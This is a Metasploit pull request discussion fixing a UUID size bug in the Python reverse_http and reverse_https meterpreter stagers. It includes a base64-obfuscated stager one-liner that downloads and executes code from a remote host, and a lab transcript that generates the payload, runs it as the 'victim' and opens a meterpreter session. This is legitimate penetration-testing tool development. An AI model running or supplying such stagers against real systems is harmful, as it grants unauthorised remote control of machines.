Fix Python reverse_http & reverse_https

[zeroSteiner]

This pull request fixes a bug in Python's reverse_http and reverse_https stagers. There's an issue where if the size is not large enough¹ to store the UUID that the UUID will be omitted², causing the stager to fail to transfer and load.

This increases the size from 5 to 30, to allow the UUID to be included and then updates the payload's cached size. The bug affects both the HTTP and HTTPS versions due to the code reuse.

Verification

• Start msfconsole
• Run use payload/python/meterpreter/reverse_http
• Set the options as appropriate
• Run to_handler to start a handler
• Run generate -f raw to get the stager
• Execute the payload and get a functioning session

Original (Broken) Output

python3 -c "import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJ10pCmhzPVtdCm89dWwuYnVpbGRfb3BlbmVyKCpocykKby5hZGRoZWFkZXJzPVsoJ1VzZXItQWdlbnQnLCdNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjE7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJyldCmV4ZWMoby5vcGVuKCdodHRwOi8vMTkyLjE2OC45MC4xOjgwODAvQVlIODYnKS5yZWFkKCkpCg==')))"
Traceback (most recent call last):
  File "<string>", line 1, in <module>
  File "<string>", line 7, in <module>
  File "<string>", line 1
    <html><body><h1>It works!</h1></body></html>
    ^
SyntaxError: invalid syntax

This bug seems to have been related to commit 5621d20.

[OJ]

LGTM. Typical that I'd be the jerk that ruined it in the first place!

[OJ]

Attacker:

msf5 payload(python/meterpreter/reverse_http) > set LHOST 192.168.146.156
LHOST => 192.168.146.156
msf5 payload(python/meterpreter/reverse_http) > set LPORT 8888
LPORT => 8888
msf5 payload(python/meterpreter/reverse_http) > to_handler
[*] Payload Handler Started as Job 0
msf5 payload(python/meterpreter/reverse_http) > 
[*] Started HTTP reverse handler on http://192.168.146.156:8888

msf5 payload(python/meterpreter/reverse_http) > generate -f raw -o /tmp/met.py
[*] Writing 526 bytes to /tmp/met.py...

msf5 payload(python/meterpreter/reverse_http) > jobs

Jobs
====

  Id  Name                    Payload                          Payload opts
  --  ----                    -------                          ------------
  0   Exploit: multi/handler  python/meterpreter/reverse_http  http://192.168.146.156:8888

Victim:

$ python3 /tmp/met.py

Attacker:

msf5 payload(python/meterpreter/reverse_http) > 
[*] http://192.168.146.156:8888 handling request from 192.168.146.156; (UUID: x5kzdlt7) Staging python payload (53933 bytes) ...
[*] Meterpreter session 1 opened (192.168.146.156:8888 -> 192.168.146.156:36000) at 2019-10-11 14:45:04 +1000

msf5 payload(python/meterpreter/reverse_http) > sessions -1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: oj

[OJ]

Release Notes

This PR fixes an issue with the Python reverse_http and reverse_https payloads. Payload invocation worked, however the first stage was not being generated correctly, resulting in no session and an error being thrown from the Python interpreter. This PR fixes this issue by fixing cached sizes and URI sizes.